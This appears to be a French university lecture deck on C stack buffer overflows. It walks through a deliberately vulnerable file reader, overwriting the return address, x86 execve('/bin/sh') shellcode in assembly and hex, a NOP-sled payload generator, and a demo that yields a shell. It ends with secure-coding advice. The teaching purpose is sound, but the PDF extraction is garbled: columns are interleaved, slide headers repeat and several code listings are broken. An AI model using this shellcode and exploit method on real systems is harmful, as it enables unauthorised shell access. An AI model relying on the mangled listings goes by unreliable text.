V-1 (09-03-2012)

Une mauvaise utilisation des variables automatiques

V74 (09-03-2012)

Une mauvaise utilisation des variables automatiques

V74 (09-03-2012)

Pratique du C Débordement de tampon

Licence Informatique — Université Lille 1 Pour toutes remarques : Alexandre.Sedoglavic@univ-lille1.fr

Semestre 5 — 2013-2014

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Technique du débordement de pile : un problème d'utilisation de la pile d'exécution

La technique de débordement de pile est trés utilisée pour exécuter du code malveillant. Pour ce faire, il faut qu'une application critique présente une vulnérabilité. Par exemple :

```
#include <stdio.h>
#define TAILLE 88
#define STOP '\xF8'
void lecture(FILE *flux){ char tampon[TAILLE] ;
                          unsigned int foo = 0;
  /* le probl\'eme est dans la ligne suivante */
 while ( (tampon[foo++]=fgetc(flux)) != STOP ) ;
int main(void){ FILE *fichier = fopen("piege","r") ;
                lecture(fichier) ;
                fclose(fichier) ;
                return 0 ;
```

La condition d'arrêt '\xF8' est adoptée pour simplifier la suite de nos manipulations.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Le débordement de pile proprement dit : exemple d'écrasement de l'adresse de

Le débordement de pile consiste à modifier l'adresse de retour à l'exemple du code suivant :

```
#include <stdio.h>
void
                          int
function
                         main
                         (void){
(void){
 int foo = 0;
                            int x = 0;
 int *ret = &foo ;
                            function();
                            x = 1;
   ret += 3 ;
                            printf("%d\n",x);
 (*ret) += 7;
                            return 0 ;
```

L'exécution de ce programme affiche 0 et non 1. Attention, cette astuce est intimement liée à l'architecture de l'ordinateur exécutant le code.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Pratique du C Débordement de tampon

Une mauvaise utilisation des variables automatiques

Pratique du C Débordement de tampon

Une mauvaise utilisation des

automatiques

Avertissement

Les codes de bas niveau suivants correspondent à une architecture — pentium — aujourd'hui obsolète.

Les principes généraux restent tout de même valables sur les machines actuelles.

L'objectif principal est d'illustrer l'usage de la pile tout en sensibilisant au maximum l'auditoire à la nécessité de la pratique du langage.

Quand on a dépassé les bornes, il n'y a pas de limite.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf

La fonction getchar pourrait être remplacée par n'importe quelle fonction remplissant la mémoire tampon à partir d'une socket, du clavier, etc. L'erreur de programmation est d'autoriser à écrire plus de TAILLE octets dans tampon.

> La fonction getchar ne vérifie pas le nombre d'octets qu'elle copie dans le buffer tampon.

%ESP	tampon var. loc.	
%EBP	%EBP1	
	adresse	
	de retour	
	paramètres	
	:	

Si par erreur le tampon est rempli, elle continue malgrès tout son travail et écrase l'adresse de retour ce qui provoque une erreur lors du ret.

L'instruction exécutée après le ret est celle se trouvant à l'adresse spécifiée par ce que getchar à placée sur la pile.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf

avant le call

x = 0main %EBP

adresse de retour x = 0main %EBP

après le call

dans function

ret = &foofoo = 0adresse de retour x = 0main %EBP

- ▶ Initialement, le pointeur ret dans la pile pointe sur la
- Après incrémentation de 1, le pointeur ret pointe sur l'adresse de retour.
- On peut ainsi incrémenter cette dernière et ne pas exécuter l'instruction suivant le call dans la fonction appelante i.e. l'affectation de 1 à x dans la fonction main (à condition de savoir sur combien d'octets elle est codée).

V74 (09-03-2012)

V74 (09-03-2012)

V74 (09-03-2012)

Quel code voudrait on voir s'exécuter

Prenons maintenant la question sous un autre angle : quelles instructions devrions nous faire exécuter pour contrôler la ressource exécutant le code vulnérable? Si on dispose d'appels système, d'un shell et de commandes externes, tout est permis :

```
#include <stdio.h>
char *name[2];
int main(void){ name[0] = "/bin/sh"
               name[1] = NULL
               execve(name[0],name,NULL) ; }
```

Dans ce cas, un shell est ouvert à l'agresseur qui peut faire ce qu'il veut avec les droits du propriétaire du code attaqué. Un dévermineur permet de voir ce que fait le processeur en exécutant ce code. Mais comme nous maîtrisons l'assembleur, utilisons le.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Un peu de code octal

Après compilation et avant édition de liens

```
.text
                      .string "/bin/sh"
0000 2F62696E txt:
    2F736800
0000 8000
                      .long txt
                                     /* En prime on obtient
000c 00000000
                                        m\^eme le code
                      .long 0
                                                               Un peu de code octal
                      .globl _start
                                        hexad\'ecimal
0010 B80B0000 _start: movl $0xb, %eax
                                        correspondant i.e.
    00
                                        le code dans le
0015 BB000000
                      movl $txt.%ebx
                                        segment de code
                                        ex\'ecut\'e par
    00
001a B9080000
                      movl $txt+8,%ecx la machine
    00
001f 89CA
                      movl %ecx.%edx
0021 83C204
                      addl
                            $4.%edx
0024 CD80
                            $0x80
                      int
0026 BB000000 done:
                      movl $0.%ebx
   00
002b B8010000
                      movl $1.%eax
```

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Application de ce principe

00 0030 CD80

```
Pratique du C
Débordement de
tampon
0000 E8100000 call .+0x15
    00
               .string "/bin/sh"
0005 2F62696E
     2F736800
00000000 b000
               .long 0
                                  /* pour un pointeur
0011 00000000
                                   /* NULL
               .long 0
0015 5B
               pop %ebx
                                  /* adresse de "/bin/sh" */
0016 895B08
               movl %ebx,8(%ebx) /* placer le pointeur
0019 B80B0000
               movl $0xb, %eax
                                  /* num\'ero de l'appel
    00
               leal 8(%ebx), %ecx
001e 8D4B08
0021 8D530C
               leal 12(%ebx), %edx
0024 CD80
               int $0x80
0026 BB000000
               movl $0,%ebx
                                 /* pour sortir proprement */
    00
002b B8010000 movl $1.%eax
    00 CD80
               int $0x80
```

Ce code ne peut pas marcher comme un processus normal car il écrit dans le segment de code... mais on peut le faire par débordement.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Traduction en code assembleur

Le code précédent s'exprime en assembleur par un appel système (codé par une interruption plutôt qu'un call execve):

```
.text
txt:
     .string "/bin/sh"
     .long txt
     .long 0
.globl _start
_start:
    movl $0xb.%eax
                        /* num\'ero de l'appel syst\'eme
     movl $txt, %ebx
                        /* nom du programme \'a ex\'ecuter */
     movl $txt+8,%ecx
                        /* argument du shell
    movl %ecx, %edx
                        /* variables d'environnement
     addl $4,%edx
    int $0x80
done:
             $0,%ebx /* Ces instructions permettent de
    movl
             $1,%eax /* terminer l'ex\'ecution du code
                       /* assembleur et sont indispensables */
     int
                                    www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf
```

Adressage relatif des étiquettes

Le premier problème rencontré est que l'on ne sait pas où ce trouve les données de notre programme en mémoire i.e. on ne connaît pas l'étiquette txt.

Pour s'en sortir, on se sert de la pile — une fois encore — et du fait que les instructions call et jmp peuvent prendre un argument relatif (une constante).

Si on place un call juste avant les données, l'adresse de retour — correspondant aux données — sera empilée et pourra être dépilée avec un pop.

Il ne restera plus qu'à récupérer cette adresse et brancher sur le code que l'on désire exécuter.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf

Comment tester notre code

Le code exécutable ci-dessus peut être placé dans une variable automatique :

```
void bar(void){
 int foo, *pfoo = &foo ;
 char shellcode[] = \frac{xE8}{x10}x00\\x00\\x0F\\x62\\x69\\x6E
                     "\x2F\x73\x68\x00\x00\x00\x00\x00\x00"
                     "\x00\x00\x00\x5B\x89\x5B\x08\xB8\x0B"
                     "\x00\x00\x00\x8D\x4B\x08\x8D\x53\x0C"
                     "\xCD\x80\xBB\x00\x00\x00\x00\xB8\x01"
                     "\x00\x00\x00\xCD\x80";
/* canoniquement void (*foo)()=(void *) shellcode; foo();*/
/* mais pour notre propos, \'ecrasons l'adresse de retour */
 *(pfoo+5) = shellcode ; /* heureusement, C est laxiste */
int main(void){ bar() ; return 0 ; }
```

Le shellcode pourrait être stocké dans un fichier texte lu par le code vulnérable.

V74 (09-03-2012)

V74 (09-03-2012)

V74 (09-03-2012)

Pourquoi la pile serait-elle exécutable?

Avec un peu de chance i.e. une architecture laxiste, le code sur la pile est exécuté :

```
% ./mshell
sh-2.05b%
```

En théorie, chaque segment (données, code, pile) est indépendant des autres et l'accès est contrôlé. Depuis le 80386, des mécanismes physiques interdisent d'exécuter le contenu d'un segment hors code. Mais en pratique (au moins pour Linux et Windows), certains segments sont partagés (ss, ds, es) et d'autres se recouvrent (cs) :

```
0x23
                  35
                           ds
                                   0x2b
cs
       0x2b
                  43
                                   0x2b
                                             43
ss
                           es
```

En effet, l'adressage d'un segment se fait sur 2^{32} octets i.e. 4 giga octets (toute la mémoire actuellement disponible).

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Quelle doit être la nouvelle adresse de retour?

On connaît la distance entre le début du buffer et l'adresse de retour. De plus, on peut — dans notre cas — avoir une vague idée de l'adresse du sommet de la pile. La fonction suivante retourne le pointeur de pile :

```
unsigned int SommetPile(void){ int main(void){
 __asm__("movl %esp,%eax"); printf("%lu\n",SommetPile());
                              return 0 ;
```

La pile est partagée par plusieurs processus apparentés et on peut parier sur la taille des empilements fait par le code cible avant de passer dans la zone vulnérable.

```
adresse de retour = ancien pointeur de pile + taille buffer
                     + imprécisions
```

Encore une fois, chaque pile associée à un processus devrait être indépendante des autres. . . mais ce n'est pas le cas.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Plaçons le piège

```
Pratique du C
Débordement de
tampon
#include<stdio.h>
#define SHELLCODESIZE 50
\label{looker} char \ shellcode[] = "\xE8\x10\x00\x00" \ etc. \ "\x00\xCD\x80" \ ;
int main(int argc, char **argv){
  unsigned long int i, taille, base;
  base = strtoul(argv[2],NULL,0) ;
 base -= taille = strtoul(argv[1],NULL,0) ;
  base -= strtoul(argv[3],NULL,0);
  for( i=0 ; i<taille-SHELLCODESIZE ; i++)</pre>
                                                                      Ce n'est pas si
   putchar('\x90');
  for( i=0 ; i<SHELLCODESIZE ; i++)</pre>
    putchar(shellcode[i]);
  char * res = (char *) &base
  for(i=0;i<sizeof(int);i++) /* le piege fonctionne</pre>
                                %exploit 108 'SommetPile' 0>piege
   putchar(*(res+i));
  putchar('\xF8');
                                % vulnerable
 return 0 ;
                                sh-2.05b$
```

*/

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Du code dans la

Déterminer la distance entre le début du buffer du code vulnérable et l'adresse de retour

Pour connaître les limites, on peut pousser à la faute. Dans notre cas, on peut soumettre des fichiers de plus en plus grand au programme vulnérable :

```
#include<stdio.h>
#include<stdlib.h>
int main(int argc, char **argv){
  int i ;
  if(argc!=2)
   return 1;
  FILE *fichier = fopen("piege","w") ; /*
                                        % ./taillebuffer 99
  i = atoi(argv[1]);
  for(;i>0;i--)
                                        % ./vulnerable
   fputc('a',fichier) ;
                                        % ./taillebuffer 100
                                        % ./vulnerable
  fputc('\xF8',fichier);
                                        Segmentation fault
 fclose(fichier);
  return 0 :
                                    www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf
```

Mise en place du piège, gestion de l'imprécision, etc.

Mais tout cela reste approximatif. Comment s'en contenter alors que l'adresse de la prochaine instruction à exécuter doit être précise?

L'instruction assembleur nop (ne rien faire) codée en hexadécimal par 90 peut compléter notre shellcode sans perturber son fonctionnement.

Il suffit de commencer à remplir le buffer avec cette instruction. Même si l'adresse de retour est trop grande, l'instruction désignée sera un nop et tous les nop seront exécuter sans conséquence avant l'exécution du shellcode.

De plus, on s'autorise plusieurs tentatives en faisant varier la taille du buffer par exemple.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf

Quelques remarques

Il existe des architectures n'utilisant pas le passage de paramètres par la pile (PowerPC pour un petit nombre de paramètres par exemple — mais pour un grand nombre, une pile d'exécution est utilisée).

Attention le cas échéant à supprimer l'ensemble des 0 sinon un scanf par exemple le prendrait pour la fin de la chaîne à charger. Pour s'en sortir il faut écrire du code équivalent :

```
\xB8\x0B\x00\x00\x00 movl $0xb,%eax
```

\x31\xC0 xor %eax, %eax /*mets %eax \'a z\'ero*/ \xB0\x0B movb \$0xb, %al

C'est du beau "computer art", une disparition à la Perec... Le choix de la condition d'arrêt ('\xF8') dans notre exemple provient du fait qu'EOF est codé par ('\xFF') et que ce caractère intervient dans la définition de l'adresse à laquelle on veut brancher dans la pile : le shell code n'est donc pas lu jusqu'au bout.

Pratique du C Débordement de

Une mauvaise utilisation des variables

Un peu de code

Du code dans la

pile?

Placer le niège

Ce n'est pas s

En tout cas, ne pas déborder les tampons

V74 (09-03-2012)

Comment placer notre piège

Il faut découvrir une faiblesse dans le code attaqué :

- ▶ soit on désassemble le code (consulter le code octal);
- ▶ soit on consulte les faiblesses publiées par le concepteur du programme (ou les utilisateurs).

Ensuite, il ne reste plus qu'à préparer le piège — construire le code assembleur ouvrant une faille — et le soumettre à la cible :

- dans notre cas, mettre le piège dans un fichier et le faire lire par le code vulnérable;
- pour l'attaque d'un serveur, scanner systématiquement les ports de machines pour voir s'ils abritent un service vulnérable

Le code piège peut ne pas être un fichier mais dans des paquets soumis à un serveur qui lit sur un port de la machine cible. . .

En 2001, CodeRed a infecté 400 000 serveurs windows en utilisant un débordement de pile.

www.fil.univ-lille1.fr/~sedoglav/C/Cours10.pdf V74 (09-03-2012)

Pratique du C Débordement de

utilisation des variables automatiques

Un peu de cod octal

oile?

riacei ie piege

En tout cas, ne pas déborder les tampons

Morale à retenir

Il est important de toujours tenir compte de la taille des tampons et de faire attention lors de l'usage de fonctions :

	proscrire	utiliser
gets		fgets
strcpy		strncpy
strcat		strncat
scanf, sprintf, etc.		

Certains compilateur prennent en charge l'interdiction du débordement de tampon (patch StackShield pour gcc).

Un fichier au format ELF contient un drapeau indiquant si le noyau ou l'éditeur de liens dynamique doivent considérer la pile comme exécutable ou pas. Le programme execstack permet de manipuler ce drapeau.